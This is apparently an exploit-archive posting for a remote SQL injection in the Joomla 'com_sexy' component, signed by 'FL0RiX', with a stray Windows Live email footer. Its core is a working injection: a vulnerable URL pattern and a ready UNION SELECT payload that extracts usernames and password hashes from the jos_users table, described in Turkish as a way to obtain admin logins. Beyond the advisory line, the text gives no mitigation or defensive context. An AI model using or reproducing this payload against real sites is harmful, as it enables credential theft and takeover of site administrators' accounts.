The Joomla Sexy component suffers from a remote SQL injection vulnerability.
4a33c434f9be87ac86ef467120bc2382dd73a5cb928cca23d2cbd6fd92b51aac
########################################################################
#
Joomla Component com_sexy SQL Injection
Vulnerability
########################################################################
#
Author :FL0RiX
#
#Greez: All Tahkikat-ul Ahlak Family
#
#
Name : com_sexy
#
#
Bug Type : SQL Injection
#
#
Infection : Admin login bilgileri alinabilir.
#
#
Demo Vuln :
#
# site.com/index.php?option=com_sexy&view=girl&id=[EXPLOIT]
#
#
EXPLOIT :
null/**/union/**/select/**/1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47/**/from/**/jos_users--
#############################################################################
_________________________________________________________________
Windows Live: Arkadaþlarýnýz size e-posta gönderdiklerinde Flickr, Twitter ve Digg'deki hareketlerinizi görürler.
http://www.microsoft.com/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:tr-tr:SI_SB_3:092010